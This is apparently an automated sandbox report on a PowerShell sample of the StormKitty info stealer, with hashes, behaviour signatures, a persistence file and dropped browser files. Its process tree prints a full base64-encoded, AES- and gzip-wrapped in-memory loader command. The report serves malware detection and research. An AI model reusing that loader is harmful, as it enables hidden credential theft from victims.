stormkitty | e8bfcb075d43c9447a0e06aced6be8a2ba9536dbf889aade07670d9b90af37ec

Analysis

max time kernel
149s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
28/02/2025, 21:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5ecb7f90c0704ddcb00fe5584a022d73.ps1
Size

447KB
MD5

822b7414d0d51d0333961d0d6ca31a21
SHA1

5158458cb99899b4d8aacd26c1d4fce917eb8460
SHA256

e8bfcb075d43c9447a0e06aced6be8a2ba9536dbf889aade07670d9b90af37ec
SHA512

26fc07adb5267bd8fb22964b69d61f35ac2483f733560a0385850b440d07d4e08a9f08c254c40e72fdff97bbf6f299347933ab25d7a86db5a3abe29a25aec2e6
SSDEEP

12288:oxX8oYy+BkhmwEjO9zpF8naw8ew8pLiyI:/khNdF4n2j

Score

10^/10

stormkitty discovery execution stealer

Malware Config

Signatures

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/3456-44-0x0000021BA4B00000-0x0000021BA4B98000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2112	powershell.exe
12	2112	powershell.exe
31	3456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2112	powershell.exe
3456	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8035806f.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8035806f.cmd	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2112	powershell.exe
2112	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3456	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 908	2112	powershell.exe	88
PID 2112 wrote to memory of 908	2112	powershell.exe	88
PID 908 wrote to memory of 3428	908	cmd.exe	90
PID 908 wrote to memory of 3428	908	cmd.exe	90
PID 3428 wrote to memory of 3456	3428	cmd.exe	92
PID 3428 wrote to memory of 3456	3428	cmd.exe	92

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\5ecb7f90c0704ddcb00fe5584a022d73.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\tmpC67C.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmpC67C.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskdmRkbWUgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHZkZG1lKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICR2ZGRtZSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCR2ZGRtZSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkdmRkbWUiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gYmFxZmcoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJy9xalUxR1RObFRMQ1hPcXJ4TFd3bEFLMFBoT0dYTDl2N3kvVHRINDBsNzQ9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0VlOHRHdUhpUDMxMnN5dHhMSUsrcnc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24ga3RtdnUoJHBhcmFtX3Zhcil7CSRkdHV2dz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkeWZybGk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkeWtrbnU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZHR1dncsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHlra251LkNvcHlUbygkeWZybGkpOwkkeWtrbnUuRGlzcG9zZSgpOwkkZHR1dncuRGlzcG9zZSgpOwkkeWZybGkuRGlzcG9zZSgpOwkkeWZybGkuVG9BcnJheSgpO31mdW5jdGlvbiBmcGdidSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJGZ4YXh1PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx1aXloPSRmeGF4dS5FbnRyeVBvaW50OwkkbHVpeWguSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHZkZG1lOyR5aWN0Yj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHZkZG1lKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaXh6IGluICR5aWN0YikgewlpZiAoJGl4ei5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGZzZ250PSRpeHouU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGNqeGJxPVtzdHJpbmdbXV0kZnNnbnQuU3BsaXQoJ1wnKTskZ2h4dmU9a3RtdnUgKGJhcWZnIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNqeGJxWzBdKSkpOyRsaXdpej1rdG12dSAoYmFxZmcgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY2p4YnFbMV0pKSk7ZnBnYnUgJGdoeHZlICRudWxsO2ZwZ2J1ICRsaXdpeiAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\ShaderCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\ShaderCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\PERTHE563456HGRSEG674RSGE\ShaderCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\PERTHE563456HGRSEG674RSGE\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac3bf9756600f6c31a15240716e6e7c6

SHA1
521aa76b55f74cafd1b579933dc0fae439acb0f5

SHA256
f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

SHA512
96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xrcyv52o.1pv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC67C.bat

Filesize
334KB

MD5
6e9e6d848f65e1c880dc06d771beeaa2

SHA1
5bbec204e30c8ebca364adb4cbcdb49616877e12

SHA256
10a8a39c90718b37671e803018680066d0bb781bb2ae251421e7380fe9d90a33

SHA512
f6949f727008e8efeb5e612e918f1513b0c5f0e33f321aadf41e1813ee1d322e288359b98555b3b08880eaca65f0ac9c0bdaa0b57542252d29feb336ad4dfa90

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm

Filesize
32KB

MD5
b7c14ec6110fa820ca6b65f5aec85911

SHA1
608eeb7488042453c9ca40f7e1398fc1a270f3f4

SHA256
fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb

SHA512
d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\PERTHE563456HGRSEG674RSGE\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

Filesize
48KB

MD5
57d57f73c6d0d1c1abdedcda9ef2d342

SHA1
eeea35dada28e3371fd2e2f913709410618227a6

SHA256
f5dfa31aad3cd40983d1234fea8901c651b6b738c7e3b0e084ad1cc5bcc16edf

SHA512
5e4192a6f0a26bcc8e9338a33a18b4ad8dff1dca389173d1bf37686f563d8995127bd2cf502acd9cf078e4bff0c39650f8bfb65414af592f8d2d02a9f325af0a

Download Submit
memory/2112-21-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/2112-12-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/2112-1-0x00000277A58E0000-0x00000277A5902000-memory.dmp

Filesize
136KB

Download
memory/2112-11-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/2112-17-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/2112-0-0x00007FF93A373000-0x00007FF93A375000-memory.dmp

Filesize
8KB

Download
memory/2112-22-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/3456-37-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/3456-38-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/3456-39-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download
memory/3456-41-0x0000021BA4640000-0x0000021BA4648000-memory.dmp

Filesize
32KB

Download
memory/3456-44-0x0000021BA4B00000-0x0000021BA4B98000-memory.dmp

Filesize
608KB

Download
memory/3456-42-0x0000021BA4AA0000-0x0000021BA4AE0000-memory.dmp

Filesize
256KB

Download
memory/3456-451-0x00007FF93A370000-0x00007FF93AE31000-memory.dmp

Filesize
10.8MB

Download